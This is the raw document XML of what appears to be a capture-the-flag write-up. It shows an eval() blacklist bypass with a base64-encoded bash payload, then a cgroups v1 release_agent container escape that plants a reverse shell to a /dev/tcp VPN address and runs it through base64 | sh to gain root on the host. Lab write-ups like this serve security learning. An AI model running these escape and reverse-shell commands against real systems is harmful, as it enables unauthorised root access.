        <w:t xml:space="preserve">/opt/sandbox.php </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">as root without providing a password.</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50"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86"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analyze the blacklist and notice that </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="188038"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">eval()</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is not restricted.</w:t>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we can use:</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'system("/bin/bash");' | base64</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eval(base64_decode("payload-base64"));</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52"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injecting the payload, we obtain a root shell inside the container. We retrieve the first flag located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70000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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the final flag is located on the main host. Therefore, we need to escape the Docker container. We use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">LinPEAS</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to enumerate privilege escalation paths:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006E">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="1155cc"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId47">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS</w:t>
        </w:r>
      </w:hyperlink>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87400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="48"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43600" cy="7874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698500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="80"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running the script, we decode the hexadecimal value obtained from </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">capsh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identify the capability </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CAP_SYS_ADMIN.</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CAP_SYS_ADMIN is a powerful capability that can lead to full root privileges.</w:t>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exploit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notify_on_release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functionality in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cgroups v1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mkdir /tmp/cgrp &amp;&amp; mount -t cgroup -o rdma cgroup /tmp/cgrp &amp;&amp; mkdir /tmp/cgrp/x</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1 &gt; /tmp/cgrp/x/notify_on_release</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`</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"$host_path/cmd" &gt; /tmp/cgrp/release_agent</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'#!/bin/bash' &gt; /cmd</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"bash -i &gt;&amp; /dev/tcp/&lt;IP-VPN&gt;/9002 0&gt;&amp;1" &gt;&gt; /cmd</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a+x /cmd</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-c "echo $$ &gt; /tmp/cgrp/x/cgroup.procs"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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simplify execution, we encode the commands in Base64:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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485900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="76"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866900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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b w:val="0"/>
          <w:bCs w:val="0"/>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Now we will execute the following command below:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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"payload-base64" | base64 -d | sh</w:t>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03300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="87"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receive a root shell on the main host.</w:t>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74"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we access:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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778000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="78"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retrieve the final flag.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000088">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:headerReference r:id="rId55" w:type="default"/>
      <w:headerReference r:id="rId56" w:type="first"/>
      <w:headerReference r:id="rId57" w:type="even"/>
      <w:footerReference r:id="rId58" w:type="default"/>
      <w:footerReference r:id="rId59" w:type="first"/>
      <w:footerReference r:id="rId6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A">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84" name="image31.jpg"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image3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9.png"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image9.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Forfun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46.png"/>
              <a:graphic>
                <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:pic>
                    <pic:nvPicPr>
                      <pic:cNvPr id="0" name="image46.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6.png"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image42.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image32.png"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.png"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.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14.png"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS" TargetMode="External"/><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7.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/jpillora/chisel" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image36.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/carlosevieira/git-dumper" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image40.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.png"/><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20.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image37.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image45.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/nmap" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image38.png"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image35.png"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image41.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.png"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image34.png"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image43.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image44.png"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/werkzeug" TargetMode="External"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><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4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wVHJT2ZcEjYrg/hbf/GgWAT2A==">CgMxLjAyDmgubWQ1eDI5eGxxOGRpMg5oLncxaGN6OHhqcnZmNTIOaC42Z2p5eWZ3eWl1MDIyDmgubGUzYWxjYXhkZjRvMg5oLnN2bmZkN21oN2V4cDIOaC5jaW1rNzN0cGlidXUyDmguMTc1ZjVjczk0ejBvOAByITE0a3NjWDBFakdfN21ObE5LNnhCelRZcGRMMEpZekdMeQ==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